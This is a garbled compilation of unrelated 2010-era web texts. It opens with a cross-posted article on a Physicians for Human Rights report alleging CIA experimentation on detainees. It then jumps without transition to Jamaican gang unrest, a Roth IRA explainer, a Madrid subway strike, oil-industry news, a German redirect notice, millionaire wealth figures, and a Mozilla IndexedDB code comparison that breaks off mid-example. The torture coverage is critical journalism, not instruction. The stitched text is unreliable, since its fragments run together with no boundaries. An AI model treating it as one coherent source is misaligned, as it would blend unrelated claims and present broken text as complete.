[ tweetmeme source= “ DandelionSalads ” only_single=false ]
by Andy Worthington
Featured Writer
Dandelion Salad
www.andyworthington.co.uk
7 June , 2010
In a 27 - page report , “ Experiments in Torture : Human Subject Research and Evidence of Experimentation in the ‘ Enhanced ’ Interrogation Program ” ( available here ) , the organization Physicians for Human Rights has brought into sharp focus the role played by US medical personnel in torture and human experimentation .
As the introduction on PHR ’s website states , this is “ the first report to reveal evidence indicating that CIA medical personnel allegedly engaged in the crime of illegal experimentation after 9/11 , in addition to the previously disclosed crime of torture .
In their attempt to justify the war crime of torture , the CIA appears to have committed another alleged war crime — illegal experimentation on prisoners . ”
This important report , which follows research undertaken by , amongst others , Jeff Kaye and Marcy Wheeler , deserves thorough coverage , and as I do n’t have time to write my own analysis , I ’m cross-posting below a very useful article published on Truthout by my colleague Jason Leopold , which analyzes the report , puts it in context , links to the work of Jeff Kaye , Marcy Wheeler and others , and also expands on the significance of the human experimentation program in the torture of the supposed “ high - value detainee ” Abu Zubaydah , about whom both Jason and I have written at length .
Human Experimentation at the Heart of Bush Administration ’s Torture Program
By Jason Leopold , Truthout , June 6 , 2010
High - value detainees captured during the Bush administration ’s “ war on terror ” who were subjected to brutal torture techniques were part of a Nazi Germany - type program involving illegal human experimentation , the purpose of which was to collect research “ data , ” according to a disturbing new report that calls on President Barack Obama , Congress and other government agencies to immediately launch inquiries and Attorney General Eric Holder to investigate the allegations .
The findings contained in the 27 - page report , “ Experiments in Torture : Human Subject Research and Evidence of Experimentation in the ‘ Enhanced ’ Interrogation Program , ” is based on extensive research of previously declassified government documents that shows the crucial role medical personnel played in establishing and justifying the legality of the Bush administration ’s torture program .
The report said the research and experimentation of detainees its authors have documented is not only a violation of the Geneva Conventions , but is a grave breach of international laws , such as the Nuremberg Code , established after atrocities committed by Nazis were exposed in the aftermath of World War II .
“ Health professionals working for and on behalf of the CIA monitored the interrogations of detainees , collected and analyzed the results of [ the ] interrogations , and sought to derive generalizable inferences to be applied to subsequent interrogations , ” states an executive summary of the report , prepared by Physicians for Human Rights .
“ Such acts may be seen as the conduct of research and experimentation by health professionals on prisoners , which could violate accepted standards of medical ethics , as well as domestic and international law .
These practices could , in some cases , constitute war crimes and crimes against humanity . ”
For example , PHR said the drowning method known as waterboarding was monitored in early 2002 by medical personnel who collected data about how detainees responded to the torture technique .
The data was then given to Steven Bradbury , the former head of the Justice Department ’s Office of Legal Counsel ( OLC ) , who used it to write a legal opinion in 2005 advising CIA interrogators on how to administer the technique , referred to in the PHR report as “ Waterboarding 2.0 . ”
“ According to the Bradbury memoranda , [ CIA Office of Medical Services ] teams , based on their observation of detainee responses to waterboarding , replaced water in the waterboarding procedure with saline solution ostensibly to reduce the detainees ’ risk of contracting pneumonia and / or hyponatremia , a condition of low sodium levels in the blood caused by free water intoxication , which can lead to brain edema and herniation , coma , and death , ” the report says .
In Bradbury ’s torture memo , he wrote that “ based on advice of medical personnel , the CIA requires that saline solution be used instead of plain water to reduce the possibility of hyponatremia ( i.e. reduced concentration of sodium in the blood ) if the detainee drinks the water . ”
PHR noted that the presence of CIA medical personnel during the waterboarding sessions “ could represent evidence of human experimentation ” because it underscores “ the danger and harm inherent in the practice of waterboarding and the enlistment of medical personnel in an effort to disguise a universally recognized tactic as a ‘ safe , legal and effective ’ interrogation tactic . ”
CIA medical personnel also obtained experimental research data by subjecting more than 25 detainees to a combination of torture techniques , including sleep deprivation , according to the report , as a way of understanding “ whether one type of application over another would increase the subjects ’ susceptibility to severe pain . ”
The information derived from the research informed “ subsequent [ torture ] practices . ”
“ This investigation had no direct clinical health care application , nor was it in the detainees ’ personal interest , nor part of their medical management , ” the report says .
“ It appears to have been used primarily to enable the Bush administration to assess the legality of the tactics , and to inform medical monitoring policy and procedure for future application of the techniques . ”
The torture methods used on detainees derived from the Army and Air Force survival training program called Survival , Evasion , Resistance and Escape ( SERE ) , which was meant to prepare US soldiers for abuse they might suffer if captured by an outlaw regime .
PHR and other human rights groups plan on filing a complaint this week with the Department of Health and Human Services ’
Office for Human Research Protections ( OHRP ) demanding the agency launch a probe into the CIA ’s Office of Medical Services .
Additionally , the group wants the Justice Department ’s ethics watchdog , the Office of Professional Responsibility , to launch a separate investigation .
OPR recently concluded a four - year long investigation into the legal work former OLC attorneys John Yoo , now a Berkeley law professor , and Jay Bybee , a federal appeals court judge on the 9th Circuit , did when drafting the August 2002 torture memos .
[ The report ] concluded both men violated professional standards when they issued their legal opinions that allowed CIA officers to use brutal methods when interrogating suspected terrorists and recommended [ they ] be referred to their state bar associations to face possible disbarment .
The judgment was softened by career prosecutor David Margolis , who was put in charge of the final recommendations and who said he was “ unpersuaded ” by OPR ’s “ misconduct ” conclusion , which faulted Yoo and Bybee for their approval of brutal interrogation techniques that were used against terrorism suspects after the 9/11 attacks .
And despite the new revelations about the Bush administration ’s torture program that seem to surface regularly , Obama still refuses to allow for war crimes investigations , saying he still prefers to “ look forwards , and not backwards ” when it comes to Bush administration ’s crimes .
Case in point , last March , during an interview with a reporter for an Indonesian television station , Obama was asked whether he was satisfied with the way Indonesia dealt with its past human rights abuses .
The president ’s response was stunning , to say the least .
“ We have to acknowledge that those past human rights abuses existed , ” Obama said in the interview .
“ We ca n’t go forward without looking backwards . ”
Stephen Soldz , a psychoanalyst and one of the authors of the PHR report , said “ it is important to realize that the logic used by the Obama administration to refuse an investigation of torture claims — that the torture memos allowed the torturers to believe their actions were legally sanctioned — does not apply to potential research on detainees . ”
“ As far as is publicly known , there exist no ‘ torture research ’ memos authorizing ignoring laws and regulations prohibiting research on torture techniques , ” Soldz said .
Frank Donaghue , PHR ’s chief executive officer , said the report released by his organization appears to demonstrate that the CIA violated “ all accepted legal and ethical standards put in place since the Second World War to protect prisoners from being the subjects of experimentation . ”
“ Not only are these alleged acts gross violations of human rights law , they are a grave affront to America ’s core values , ” he added .
Rev. Richard Killmer , executive director of the the National Religious Campaign Against Torture , said PHR ’s findings “ recalls some of humanity ’s darkest days –charges from which no person of faith can afford to turn away . ”
As expected , the CIA denied the report ’s assertions .
Spokesman Paul Gimigliano said the agency , “ as part of its past detention program , [ did not ] conduct human subject research on any detainee or group of detainees . ”
But Gimigliano ’s denials are contradicted by dozens of former intelligence and national security officials who , as recently as last March , said detainees were experimented on .
Indeed , the conclusions the report ’s authors reached in the area of sleep deprivation confirm several recent investigative reports published by Truthout related to the torture and experimentation the Bush administration ’s first high - value detainee , Abu Zubaydah , was subjected to after he was captured in March 2002 .
A former National Security official knowledgeable about the Bush administration ’s torture program previously told Truthout that Zubaydah was “ an experiment … a guinea pig ” used so CIA contractors could obtain data .
The data was then shared with officials at the CIA and the Justice Department , who used that information to draft the August 2002 torture memos stating what interrogation methods could be legally used , how often the methods could be employed and how it should be administered without crossing the line into torture .
The PHR report does not identify Zubaydah by name .
In March , Truthout reported , based on interviews with more than two dozen intelligence and national security officials , that one of the main reasons Zubaydah ’s torture sessions were videotaped was to gain insight into his “ physical reaction ” to the techniques used against him .
For example , one current and three former CIA officials said some videotapes showed Zubaydah being sleep deprived for more than two weeks .
Contractors hired by the CIA studied how he responded psychologically and physically to being kept awake for that amount of time .
By looking at videotapes , they concluded that after the 11th consecutive day of being kept awake Zubaydah started to “ severely break down . ”
So , the torture memo signed by Bybee concluded that 11 days of sleep deprivation was legal and did not meet the definition of torture .
PHR ’s analysis on sleep deprivation concluded , based on a review of documents , that “ government lawyers used observational data collected by health professionals from varying applications of sleep deprivation to inform legal evaluations regarding the risk of inflicting certain levels of harm on the detainee , and to shape policy that would guide further application of the technique . ”
The report also determined that the experimentation helped create a framework to protect the torturers from war crimes and other charges .
“ OLC lawyers argued that efforts to refine and improve the application of techniques would provide a potential ‘ good faith ’ defense for interrogators against charges of torture , ” the report said .
“ They argued that such a medical monitoring regime would remove the element of intent to cause harm from the act , which is a necessary requirement for a successful prosecution of a torture charge under US law , and that a ‘ good faith belief need not be a reasonable belief ; it need only be an honest belief . ’
Thus , research on the detainees became a key part of the OLC legal strategy to demonstrate the lack of intent to commit torture . ”
Nathaniel Raymond , director of PHR ’s Campaign Against Torture , said , “ Justice Department lawyers appear to have never assessed the lawfulness of the alleged research on detainees in CIA custody , despite how essential it appears to have been to their legal cover for torture . ”
Brent Mickum , Zubaydah ’s attorney , said PHR ’s report is evidence that there was an “ experimental element to the torture program and it was approved at the highest levels of government . ”
“ I have said literally for years that I believe my client was tortured before any of these enhanced interrogation techniques were approved by the Justice Department , ” Mickum told Truthout .
“ And now we know that not only was my client subjected to torture but he was part of an experiment .
This is so ugly , so shameful , so unlawful .
If this revelation does n’t kick in an obligation on the part of the Department of Justice to investigate war crimes than I do n’t know what does .
The Obama administration has essentially refused to do that .
At some point , the Obama administration has to take seriously what their obligations are under the law . ”
Mickum said he is preparing to file a series of motions in federal court calling for the preservation of documents based on the conclusions contained in PHR ’s report .
For those who have closely followed the details that have surfaced over the years related to the Bush administration ’s torture program , a chunk of the information contained in the report related to human experimentation that has already been painstakingly documented by Marcy Wheeler at her blog Emptywheel , and Truthout ’s own Jeffrey Kaye on his blog Invictus and in articles published on this website and at Firedoglake .
In her analysis , Wheeler focused on a section of the report dealing with revisions the Bush administration made in 2006 to the War Crimes Act ( WCA ) , which “ retroactively changed [ d ] the law on human experimentation [ so ] that experimentation no longer needed to have a personal benefit to the research subject , and could instead be justified because of a ‘ legitimate ’ interest . ”
According to PHR ’s report , “ the new language of the WCA added two qualifications that appear to have lowered the bar on biological experimentation on prisoners . ”
“ That language requires that the experiment have a ‘ legitimate ’ purpose , but does not require that it be carried out in the interest of the subject , ” the report noted .
“ It also adds the requirement that the experiment not ‘ endanger ’ the subject , which appears to raise the threshold for what will be considered illegal biological experimentation . ”
PHR has called on Congress to amend the law .
In his coverage of the PHR report , Kaye wrote that one of the “ various threads left dangling ” he remains most concerned about involves “ the links between the SERE research undertaken by investigators led by Dr. Charles A. Morgan and the CIA experimental torture program , as reported in an appendix to PHR ’s report . ”
“ PHR describes the SERE research undertaken during the years prior to the issuance of the OLC memos , and explains that the results of that research demonstrated how the risk of harm was inherent in the SERE techniques , ” wrote Kaye , who has reported extensively on Morgan ’s connections to the CIA ’s “ enhanced interrogation techniques . ”
“ In addition , [ the report notes ] , ‘ the experimental framework of these studies intentionally or unintentionally laid the groundwork for unethical and illegal human experimentation that would follow . ’ ”
Meanwhile , Obama ’s presence in the White House has not resulted in an abandonment of the research side of the interrogation program .
Last March , Director of National Intelligence Dennis Blair , who recently resigned , disclosed that the Obama administration ’s High - Value Detainee Interrogation Group ( HIG ) , planned on conducting “ scientific research ” to determine “ if there are better way to get information from people that are consistent with our values . ”
“ It is going to do scientific research on that long - neglected area , ” Blair said during testimony before the House Intelligence Committee .
He did not provide additional details as to what the “ scientific research ” entailed .
Note : For further information , see this BoingBoing interview with Dr. Scott Allen , the lead medical author of the report , who is co-director of the Center For Prisoner Health and Human Rights at Brown University , and Medical Advisor to PHR .
Andy Worthington is the author of The Guantánamo Files : The Stories of the 774 Detainees in America ’s Illegal Prison ( published by Pluto Press , distributed by Macmillan in the US , and available from Amazon — click on the following for the US and the UK ) .
To receive new articles in your inbox , please subscribe to my RSS feed ( and I can also be found on Facebook and Twitter ) .
Also see my definitive Guantánamo prisoner list , updated in January 2010 , details about the new documentary film , “ Outside the Law : Stories from Guantánamo ” ( co-directed by Polly Nash and Andy Worthington , and launched in October 2009 ) , and , if you appreciate my work , feel free to make a donation .
see
Quarterly Fundraising Appeal : Please Support my Guantánamo Work | Andy Worthington
Zangief is more than meets the eye in this fan - made custom Transformer , complete with rust chest hair .
Created by Deej at the Fanboy Forum .
Thanks Benjamin !
Advertisement
" These are people who had no real shelter - no houses , not even caves - so we can only speculate that by the time they returned , they had developed physiologically to cope with the cold , as well as developing behavioural strategies such as planning winter stores and making good use of fire , '' said Dr Wenban - Smith .
SAN MIGUEL DE ALLENDE , Mexico —
The Jamaican government declared a state of emergency in portions of Kingston , the capital , on Sunday after supporters of a gang leader who is wanted in the United States on gun and drug charges attacked three police stations in an attempt to pressure the government to let him remain free , officials said .
In the western Kingston neighborhood where the gang leader , Christopher Coke , is holed up , residents set up barricades and exchanged gunfire with the police .
The Daily Gleaner reported that gunmen allied with Mr. Coke , who is commonly known as Dudus , were roaming the streets with high - powered rifles .
Amid growing unrest , the government met in an emergency session to try to keep the lawlessness from spinning out of control .
The authorities , who said other gangs appeared to be coming to Mr. Coke ’s aid , called on him to turn himself in for a hearing on extradition to the United States .
“ The police are publicly calling on Christopher Coke , otherwise called ‘ Dudus , ’ ‘ Short Man ’ and ‘ President , ’ to hand himself over , ” a police statement said .
“ The security forces wish to make it very clear that they view the barricading as an act of cowardice on the part of selfish criminal elements , mainly Mr. Coke . ”
Pin 0 Shares
I ‘ve been talking quite a bit since I launched this site about Roth IRAs , and why they 're such a great idea .
After all , who does n't like tax free money at retirement ?
( Can you tell that I like them ? )
One thing I have n't examined very closely , however , is the fact that Roth IRAs are not available to everyone .
It 's like when you were a youngster and you saw that they were giving out full sized candy bars at one house at Halloween .
Everyone got one until they got to you – and the candy ran out !
Sorry !
Continues after Advertisement
Roth IRAs are like those full sized candy bars – they are n't available to everyone , and you may be left out in the cold if you do n't meet the requirements .
Age Restrictions ?
Roth IRAs are available to anyone regardless of age , however , there is a catch .
The child needs to have claimed “ earned income ” .
That means that your child will actually need to have received a W - 2 or 1099 showing the income made .
So that babysitting job they had last week , or the job cutting the neighbor 's lawn probably wo n't cut it .
So , no age restrictions , but there is a need for “ earned income ” .
Modified Adjusted Gross Income Affects Roth Eligibility
Your MAGI or Modified Adjusted Gross Income will be one of the most important factors determining whether you are eligible to contribute to a Roth IRA .
Your MAGI calculation will be used to determine if you exceed the Roth IRA phaseout limits to be able to contribute funds .
If you fall somewhere in the middle of the phaseout range , it can mean some fancy math trying to find out how much you can exactly contribute to a Roth .
First , here 's the phaseout limits :
IRA Type Single Married Filing Jointly Roth IRA $ 105,000 – $ 120,000 $ 167,000 – $ 177,000 Traditional IRA $ 55,000 – $ 65,000 $ 89,000 – $ 109,000
Example : Let 's say you make $ 110,000 and you 're single .
How much could you contribute to a Roth IRA since you 're smack dab in the middle of the phaseout range ?
Here ' s how you figure it out .
Find out the phase you fall into .
In this case you fall into the $ 105,000 - $ 120,000 range .
Subtract your MAGI from the upper range of the phaseout range .
In this case that would mean $ 120,000 - $ 110,000 = $ 10,000 .
Divide the number in step two by the amount of the spread in the range ( $ 10,000 / $ 15,000 = .6667 or 66.67 % )
You are able to contribute 66.67 % of the $ 5,000 limit .
Since you can contribute 66.67 % of the limit that comes to a total contribution for the year of $ 3333.33 .
Under The Phaseout Roth IRA Contribution Limit
For the 2010 tax year Roth IRA cntribution limits stay steady at $ 5,000 .
For those over the age of 50 , you can make a catch up contribution of $ 1,000 .
That means for 2010 you have a total contribution limit of $ 6,000 .
If you ’re married , that ’s $ 6,000 for you and $ 6,000 for your spouse .
Start A Roth IRA Today – Time Is Your Friend !
If you 're eligible for a Roth IRA and you 've decided to open one , do it now !
The longer you invest your money for , the greater the effects of compounding interest !
So get moving !
Pin 0 Shares
Apartment rents rose during the first quarter , ending five straight quarters of declines and signaling the worst may be over for the hard - hit sector .
Nationally , the apartment vacancy rate stayed flat at 8 % , the highest level since Reis Inc. , a New York research firm , began its tally in 1980 .
Reis tracks vacancies and rents in the top 79 ...
Structure real - world projects are among the very best methods to discover how to code .
And also if you are going to develop a task , you may as well make it one of the most popular and also a lot of fun video games of all time : Tetris .
There are several video training courses around internet ( mainly Youtube ) that will assist you to find out the [ … ]
Madrid subway shut down by mass strike
By Alex Lantier
30 June 2010
Striking train drivers shut down the Madrid subway yesterday , ignoring minimum service rules imposed by the Madrid regional government .
Traffic jams rapidly spread throughout the city .
The subway network carries 2 million passengers daily ; bus and taxi services were overwhelmed as commuters tried to get to work .
After the Madrid regional government led by Esperanza Aguirre of the right - wing Partido Popular ( PP , People ’s Party ) demanded a 5 percent wage cut for Metro workers , workers gathered in an assembly on June 22 and voted for a three - day strike proposed by the unions , starting on June 28 .
Aguirre ’s cut violates a collective contract negotiated last year .
Workers demonstrated before the Madrid regional Assembly on June 24 , chanting , “ Out! Out ! ” and clashing with National Police .
After the first day of strikes — when minimum service rules forced workers to maintain 50 percent of normal service levels — a workers ’ assembly including 4,000 of the 7,500 - strong workforce voted for a total strike for yesterday .
Workers voted yesterday to extend the total strike to today and to meet this morning to decide on whether to extend the strike .
Workers mounted effective pickets around stations and train depots .
Pickets foiled an attempt by Metro management and the authorities to re-open line 8 , which connects the airport to government ministries and the downtown area , with strikebreakers escorted by police .
Metro management decided yesterday to close all of its train stations , noting the “ non-fulfillment of minimum service on the entire network . ”
It is reportedly asking private bus companies to coordinate their fleets as a strikebreaking service , should Metro workers vote tomorrow to extend the strike .
Teodoro Piñuelas , general secretary for Madrid - Metro of the Unión General del Trabajo ( General Union of Labor , UGT ) , called yesterday ’s strike a “ success . ”
He told El País that pickets are “ more informative than ever ” and that strikers “ do not require any arguments to support the stoppages . ”
Representatives of the UGT , the CC.OO ( Comisiones Obreras , Workers Commissions trade union ) and the Conductors ’ Union met with Metro and regional officials yesterday .
After the meeting , trade union officials said they had received no concrete proposals on wages .
Madrid officials made hysterical denunciations of strikers , threatening to examine the files of workers who did not report for minimum service duty .
Madrid Transport Councillor José Ignacio Echeverría said the “ strike is already not a strike , ” but “ non-fulfillment of minimum service rules , which is a crime . ”
He added that the strike is “ political ” and that there would be “ no negotiations while minimum service rules are not respected . ”
Officials of the national government , led by Prime Minister José Rodriguez Zapatero of the Partido Socialista Obrero Español ( PSOE , Spanish Socialist Workers Party ) , also opposed the strike .
Labour Minister Celestino Corbacho insisted that “ the right to strike must be put in relation with the mobility rights of other citizens . ”
Similarly , Economy Minister Elena Salgado demanded adherence to minimum service rules , while claiming to respect the right to strike .
This position is both deceitful and absurd : minimum service rules inherently violate the right to strike , since the requirement that a minimum number of workers be on the job prevents all the workers from simultaneously exercising their right to strike .
Salgado also implicitly threatened strikers with legal action , saying that courts should decide if workers had launched the strike in an “ abusive ” fashion .
Salgado added that , throughout the economic crisis , the unions had shown “ an absolutely responsible attitude . ”
She said that she was convinced that this conduct “ would maintain itself in the future . ”
With this evasive comment , Salgado indicated that the trade unions , the PSOE , and its allies in the petty - bourgeois left all are relying on each other to prevent the strike from getting out of control and mounting a political challenge to austerity policies that are hated throughout Europe .
Indeed , the current strike broke out and stopped the subway system only because workers organised mass meetings and demonstrations , which the unions could not control without calling strikes .
This testifies to the rising sentiment among workers for opposition to austerity policies — a position that places them in opposition to unions hostile to political struggle against the PSOE government .
Indeed , the UGT is traditionally affiliated to the PSOE , while CC.OO is politically close to Izquierda Unida ( United Left ) , an umbrella group including the Communist Party that is close to the PSOE .
The Madrid strike underscores that the formation of independent workplace organisations , based on political opposition to the government , is now critical to the expression of real working class opposition to austerity policies .
To the extent that these struggles do not base themselves on a socialist perspective to take power , however , and remain tied to the political establishment and the unions , they are bound to suffer defeat .
The unions have worked with Zapatero ever since the outbreak of the European debt crisis to impose the same austerity measures that politicians and the banks have demanded in Greece , Portugal and throughout Europe .
In January , Zapatero met secretly with UGT leader Cándido Méndez and CC.OO chief Ignacio Toxo to prepare his government ’s austerity plan .
This involved cuts of at least € 50 billion in state spending , as Zapatero aimed to reduce the budget deficit from 11.4 percent to 3 percent of GDP in the next three years .
Zapatero also planned a two - year increase in the retirement age , to 67 .
With these measures , the PSOE and the banks sought to loot a working class already devastated by decades of right - wing policies and the fallout of a recently burst housing bubble .
Unemployment stands at a staggering 22 percent , and youth unemployment is estimated at roughly 40 percent .
Nonetheless , the unions did not call a strike until late February , when they organised a toothless one - day strike , on a perspective of asking the government to soften its policy .
At the time , Méndez said , “ Social peace is everyone ’s asset and responsibility .... We are not going to break it and we do n’t want to do so in the future . ”
The strike did nothing to halt social cuts in Spain .
However , they did allow the banks to gauge the political situation .
Reuters noted : “ The size of the protests , the first by the unions against Socialist Prime Minister Jose Luis Rodriguez Zapatero , was being monitored by international investors for signs the government might struggle to contain social anger against the rise in the pension age to 67 from 65 and a 50 billion euro austerity plan . ”
As working class anger against cuts has grown , international banks have progressively cut off lending to Spain .
While there has been increasing discussion in Spain of a general strike , the trade unions are pressing to delay action for nearly three months , until a mass demonstration on September 9 , and then a European day of action on September 29 .
These proposed actions , however , are not fundamentally different from the February strike .
The trade unions deeply fear and oppose a political confrontation between the working class and the government .
In a joint news conference on June 15 , CC.OO chief Ignacio Toxo and Méndez declared that the September 29 action “ is not to change the government ” but to make it alter direction .
Earlier , Toxo had warned : “ A general strike would be the worst thing to happen to Spain . ”
Similarly , Vicente Rodríguez , the Conductors Union secretary leading the ongoing Metro strike committee in Madrid , told El País yesterday : “ The Metro workers never have wanted to mix politics with the trade - union movement .
We want to get results in June and not leave anything for September . ”
However , a perspective of settling for what management will temporarily give under pressure , and avoiding all appeals for political support in the rest of the working class , is a recipe for further defeats in Spain and internationally .
With governments and corporations everywhere expecting continued economic decline , the most the unions will negotiate are temporary postponements and reductions in cuts .
After workers protested a May 26 announcement that Madrid authorities would slash garbage workers ’ conditions — including cutting 200 jobs , an unspecified wage cut and modifying the rest schedule — the UGT and CC.OO called for an indefinite strike starting on June 21 .
The unions then negotiated a last - minute sellout to avert the strike , which included a wage freeze and postponing the job losses for two years .
Chevron Corp. has come out swinging in its fight to continue drilling in the deep waters of the Gulf of Mexico , arguing that not all oil firms should be tarred with the brush of BP PLC's Deepwater Horizon disaster .
In an interview with The Wall Street Journal , Chevron chairman and CEO John Watson said he accepts the need for tighter drilling regulations in the wake of the spill , which since April has fouled the waters and coastline of the Gulf .
But Mr. Watson , 52 , called unnecessary the six - month moratorium on deep - water drilling ...
Sie wollten die folgende Seite besuchen :
http://www.andeas-demmer.de//en/2010/06/12/dashboard-kwin-effekt-plugin/
Die Adresse , welche Sie aufrufen wollen , enthält noch meinen Geburtsnamen .
Sie wurden daher auf meine neue Website weitergeleitet .
Die neue Website wurde von Grund auf neu gestaltet und auch verschlankt .
Wahrscheinlich hat sich also die Adresse der Seite , welche Sie suchen , geändert oder die Seite ist leider nicht länger vorhanden .
Entschuldigung hierfür .
Sie können im Suchformular rechts nach dem gewünschten I nhalt suchen oder Ihren Besuch auf der Startseite fortsetzen .
Unemployment remains at near - record levels , and most Americans are still struggling to rebuild their battered retirement portfolios .
But millionaires ?
They 're baaaack .
Thanks in large part to the rebounding stock market , the number of American households with investments worth at least $ 1 million climbed 15 % in 2009 , according to a study of global wealth by Boston Consulting Group .
This boom has not extended to all parts of the American population .
While the ranks of millionaires were growing , the unemployment rate went from 7.7 % at the beginning of 2009 to 10 % at the year 's end , and the economy as a whole shrunk by 2.4 % .
These trends led to a greater concentration of wealth -- and greater inequality -- in the United States and around the world .
Although millionaires account for a smaller percentage of the U.S. population than they did in 2007 ( 4.1 % versus 4.6 % ) , they control a greater percentage of the wealth ( 55.2 % in 2009 versus 55.1 % in 2007 ) .
“ It ’s been a recession where everyone took a hit -- with the bottom taking a bigger hit .
And then the wealthy alone have bounced back , ” said Timothy Smeeding , who studies income inequality at the University of Wisconsin .
The new data provide one of the first broad - based looks at the shifts in inequality during 2009 , when the U.S. stock market began its rapid ascent after the credit crisis .
The new figures are consistent with the quick recovery of investment banks , which have shown skyrocketing profits and bonuses over the last year .
Bonuses at New York banks rose 17 % in 2009 , according to a study by the New York State Comptroller .
The BCG study is based on an analysis of wealth , defined as assets in banks and other investment vehicles around the world .
It does not include real estate .
“ Assets have recovered much faster than we expected , to be candid , ” said Monish Kumar , a managing director in BCG ’s New York office .
“ Who were the drivers ?
Who is benefiting most from that development ? ” Kumar said during an event Thursday morning .
“ This is not a big surprise ; it ’s obviously the richer households who are seeing the biggest increase in wealth . ”
The rise in inequality during 2009 continues a trend that has been going on over the last few decades , one that took a brief hiatus in 2008 during the recession .
In many countries , wealth recovered in 2009 and returned to levels reached before the financial crisis .
Because the United States saw the greatest drop in wealth in 2008 ( 20 % ) , the significant rise in 2009 ( 15 % ) was still not enough to recover all of those losses .
The steep drop and rise in the United States occurred largely because the country has a greater percentage of its wealth tied up in stocks than any other region in the world .
The United States also has the most uneven distribution of wealth .
In both Japan and Europe , a significant majority of the wealth is in the hands of those with more than $ 100,000 but less than $ 1 million .
In the United States , on the other hand , a majority of the wealth is in the hands of millionaires -- the only region in the world other than the Middle East where that is the case .
Even in Latin America , which is thought of as a region with great inequality , millionaires control 42 % of the wealth .
Globally , millionaires control 38 % of the wealth , up from 36 % in 2008 .
Because the figures do not include housing assets , they do not reflect the losses that many Americans experienced in the value of their homes .
Smeeding 's recent studies suggest that the drop in housing prices has hit middle - class families particularly hard .
The analysts at BCG said that even though the wealthy have bounced back , many have still not regained their trust in the financial system -- and they are still wary of the stock market and investment managers , who saw their revenues decline over the last year .
“ It does n’t feel to them like they are fully back in business , ” said Bruce Holley , in BCG ’s New York office .
-- Nathaniel Popper
London Telegraph
June 21 , 2010
The Deepwater Horizon rig , which exploded causing the Gulf of Mexico oil spill , had suffered a leak in the weeks leading up to the blast , an employee has claimed .
Tyrone Benton told the BBC that he identified a leak in the rig ’s safety equipment weeks before the explosion .
He claimed that the leak was not fixed at the time .
Instead , the faulty device was shut down , forcing the rig to rely on a second one .
“ We saw a leak on the pod , so by seeing the leak we informed the company men , ” Mr Benton said .
“ They have a control room where they could turn off that pod and turn on the other one , so that they do n’t have to stop production . ”
The pods control the blowout preventer , the most important piece of safety equipment on the rig , and contain both electronics and hydraulics .
This is where Mr Benton said the problem was found .
Full article here
Web developers already have localStorage , which is used for client side storage of simple key - value pairs .
This alone does n’t address the needs of many web applications for structured storage and indexed data .
Mozilla is working on a structured storage API with indexing support called IndexedDB , and we will have some test builds in the next few weeks .
This can be compared to the WebDatabase API implemented by several browsers that uses a subset of the allowable language of SQLite .
Mozilla has chosen to not implement WebDatabase for various reasons discussed in this post .
In order to compare IndexedDB and WebDatabase , we are going to show four examples that use most parts of the asynchronous APIs of each specification .
The differences between SQL storage with tables ( WebDatabase ) and JavaScript object storage with indexes ( IndexedDB ) becomes pretty clear after reading the examples .
The synchronous versions of these APIs are only available on worker threads .
Since not all browsers currently implement worker threads , the synchronous APIs will not be discussed at this time .
The IndexedDB code is based off a proposal that Mozilla has submitted to the W3C WebApps working group that has gotten positive feedback so far .
The code for both APIs does not include any error handling ( for brevity ) , but production code should always have it !
These examples are for the storage of a candy store ’s sale of candy to customers , which we ’ll refer to as kids .
Each entry in candySales represents a sale of a specified amount of candy to a kid , specified by an entry in candy and kids respectively .
Example 1 – Opening and Setting Up a Database
This first example demonstrates how to open a database connection and create the tables or object stores if the version number is not correct .
Upon opening the database , both examples check the version and create the necessary tables or object stores and then set the correct version number .
WebDatabase is a bit stricter in how it handles versions by giving an error if the database version is not what the caller expects ( this is specified by the second argument to openDatabase ) .
IndexedDB simply lets the caller handle versioning as they see fit .
Note that there is active discussion about how IndexedDB should handle version changes in the working group .
WebDatabase
var db = window.openDatabase ( " CandyDB " , " " , " My candy store database " , 1024 ) ; if ( db.version != " 1 " ) { db.changeVersion ( db.version , " 1 " , function ( tx ) { //
User 's first visit .
Initialize database .
var tables = [ { name : " kids " , columns : [ " id INTEGER PRIMARY KEY " , " name TEXT " ]} , { name : " candy " , columns : [ " id INTEGER PRIMARY KEY " , " name TEXT " ] } , { name : " candySales " , columns : [ " kidId INTEGER " , " candyId INTEGER " , " date TEXT " ] } ] ; for ( var index = 0 ; index < tables.
length ; index ++ ) { var table = tables [ index ] ; tx.executeSql( " CREATE TABLE " + table.name + " ( " + table.columns.join ( " , " ) + " ) ; " ) ; } } , null , function ( ) { loadData ( db ) ; } ) ; } else { //
User has been here before , no initialization required .
loadData( db ) ; }
IndexedDB
var request = window.indexedDB.open( " CandyDB " , " My candy store database " ) ; request.onsuccess = function ( event ) { var db = event .
result ; if ( db.version != " 1 " ) { //
User 's first visit , initialize database .
var createdObjectStoreCount = 0 ; var objectStores = [ { name : " kids " , keyPath : " id " , autoIncrement : true } , { name : " candy " , keyPath : " id " , autoIncrement : true } , { name : " candySales " , keyPath : " " , autoIncrement : true } ] ; function objectStoreCreated ( event ) { if (++createdObjectStoreCount == objectStores.length ) { db.setVersion ( " 1 " ) .onsuccess = function ( event ) { loadData ( db ) ; } ; } } for ( var index = 0 ; index < objectStores.length ; index ++ ) { var params = objectStores [ index ] ; request = db.createObjectStore(params.name , params.keyPath , params.autoIncrement ) ; request.onsuccess = objectStoreCreated ; } } else { //
User has been here before , no initialization required .
loadData ( db ) ; } } ;
Example 2 – Storing Kids in the Database
This example stores several kids into the appropriate table or object store .
This example demonstrates one of the risks that have to be dealt with when using WebDatabase : SQL injection attacks .
In WebDatabase explicit transactions must be used , but in IndexedDB a transaction is provided automatically if only one object store is accessed .
Transaction locking is per-object store in IndexedDB .
Additionally , IndexedDB takes a JavaScript object to insert , whereas with WebDatabase callers must bind specific columns .
In both cases you get the insertion id in the callback .
WebDatabase
var kids = [ { name : " Anna " } , { name : " Betty " } , { name : " Christine " } ] ; var db = window.openDatabase( " CandyDB " , " 1 " , " My candy store database " , 1024 ) ; db.transaction ( function ( tx ) { for ( var index = 0 ; index < kids. length ; index ++ ) { var kid = kids [ index ] ; tx.executeSql ( " INSERT INTO kids ( name ) VALUES ( : name ) ; " , [ kid ] , function ( tx , results ) { document.getElementById(" display " ) .
textContent =
" Saved record for " + kid.name + " with id " + results.insertId ; } ) ; } } ) ;
IndexedDB
